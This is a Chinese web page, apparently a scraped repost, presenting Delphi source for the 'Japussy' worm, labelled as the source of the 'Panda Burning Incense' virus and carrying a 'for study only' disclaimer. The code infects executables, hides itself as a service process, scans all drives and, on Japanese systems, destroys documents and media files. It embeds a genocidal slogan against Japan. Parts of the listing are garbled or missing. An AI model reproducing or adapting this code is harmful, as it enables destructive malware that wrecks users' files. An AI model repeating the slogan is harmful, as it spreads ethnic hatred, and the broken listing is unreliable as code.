www swlp info(INFO系统)
时间:2024-10-18 22:33:23 来源:生龙活虎网 作者:每日趣闻 阅读:727次
山寨版熊猫烧香是什么啊?熊猫烧香病毒源代码 --------------------------------------------------------------------------------仅供学习\研究使用,否则后果自负.本站不负任何责任! 代码:--------------------------------------------------------------------------------程序代码program Japussy;uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe} IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = "If a race need to be killed out, it must be Yamato. " + "If a country need to be destroyed, it must be Japan! " + "*** W32.Japussy.Worm.A ***";function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external "Kernel32.dll"; //函数声明var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;var Ver: TOSVersionInfo;begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True;end;{ 在流之间复制 }procere CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer);var sCurPos, dCurPos: Integer;begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0);end;{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }procere ExtractFile(FileName: string);var sStream, dStream: TFileStream;begin try sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := TFileStream.Create(FileName, fmCreate); try sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally sStream.Free; end; except end;end;{ 填充STARTUPINFO结构 }procere FillStartupInfo(var Si: STARTUPINFO; State: Word);begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil;end;{ 发带毒邮件 }procere SendMail;begin //哪位仁兄愿意完成之?end;{ 感染PE文件 }procere InfectOneFile(FileName: string);var HdrStream, SrcStream: TFileStream; IcoStream, DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array[0..1] of Char;begin try //出错则文件正在被使用,退出 if CompareText(FileName, "JAPUSSY.EXE") = 0 then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do //检查PE文件头 begin SrcStream.Seek(i, soFromBeginning); SrcStream.Read(Buf, 2); if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记 begin IsPE := True; //是PE文件 Break; end; end; SrcStream.Seek(-4, soFromEnd); //检查感染标记 SrcStream.Read(iID, 4); if (iID = ID) or (SrcStream.Size 16) and (SearchRec.Name ".") and (SearchRec.Name "..") then Result := 0 //不是目录 else if (SearchRec.Attr = 16) and (SearchRec.Name ".") and (SearchRec.Name "..") then Result := 1 //不是根目录 else Result := 2; //是根目录 end;begin if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then begin repeat PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑 if IsValidDir(SearchRec) = 0 then begin Fn := Path + SearchRec.Name; Ext := UpperCase(ExtractFileExt(Fn)); if (Ext = ".EXE") or (Ext = ".SCR") then begin InfectOneFile(Fn); //感染可执行文件 end else if (Ext = ".HTM") or (Ext = ".HTML") or (Ext = ".ASP") then begin //感染HTML和ASP文件,将Base64编码后的病毒写入 //感染浏览此网页的所有用户 //哪位大兄弟愿意完成之? end else if Ext = ".WAB" then //Outlook地址簿文件 begin //获取Outlook邮件地址 end else if Ext = ".ADC" then //Foxmail地址自动完成文件 begin //获取Foxmail邮件地址 end else if Ext = "IND" then //Foxmail地址簿文件 begin //获取Foxmail邮件地址 end else begin if IsJap then //是倭文操作系统 begin if (Ext = ".DOC") or (Ext = ".XLS") or (Ext = ".MDB") or (Ext = ".MP3") or (Ext = ".RM") or (Ext = ".RA") or (Ext = ".WMA") or (Ext = ".ZIP") or (Ext = ".RAR") or (Ext = ".MPEG") or (Ext = ".ASF") or (Ext = ".JPG") or (Ext = ".JPEG") or (Ext = ".GIF") or (Ext = ".SWF") or (Ext = ".PDF") or (Ext = ".CHM") or (Ext = ".AVI") then SmashFile(Fn); //摧毁文件 end; end; end; //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑 Sleep(200); until (FindNext(SearchRec) 0); end; FindClose(SearchRec); SubDir := TStringList.Create; if (FindFirst(Path + "*.*", faDirectory, SearchRec) = 0) then begin repeat if IsValidDir(SearchRec) = 1 then SubDir.Add(SearchRec.Name); until (FindNext(SearchRec) 0); end; FindClose(SearchRec); Count := SubDir.Count - 1; for i := 0 to Count do LoopFiles(Path + SubDir.Strings[i] + "", Mask); FreeAndNil(SubDir);end;{ 遍历磁盘上所有的文件 }procere InfectFiles;var DriverList: string; i, Len: Integer;begin if GetACP = 932 then //日文操作系统 IsJap := True; //去死吧! DriverList := GetDrives; //得到可写的磁盘列表 Len := Length(DriverList); while True do //死循环 begin for i := Len downto 1 do //遍历每个磁盘驱动器 LoopFiles(DriverList[i] + ":", "*.*"); //感染之 SendMail; //发带毒邮件 Sleep(1000 * 60 * 5); //睡眠5分钟 end;end;{ 主程序开始 }begin if IsWin9x then //是Win9x RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 else //WinNT begin //远程线程映射到Explorer进程 //哪位兄台愿意完成之? end; //如果是原始病毒体自己 if CompareText(ExtractFileName(ParamStr(0)), "Japussy.exe") = 0 then InfectFiles //感染和发邮件 else //已寄生于宿主程序上了,开始工作 begin TmpFile := ParamStr(0); //创建临时文件 Delete(TmpFile, Length(TmpFile) - 4, 4); TmpFile := TmpFile + #32 + ".exe"; //真正的宿主文件,多一个空格 ExtractFile(TmpFile); //分离之 FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, ".", Si, Pi); //创建新进程运行之 InfectFiles; //感染和发邮件 end;end.文章来源:Yourof编程社区 http://www.Yourof.com
(责任编辑:国内新闻)
最新内容
推荐内容
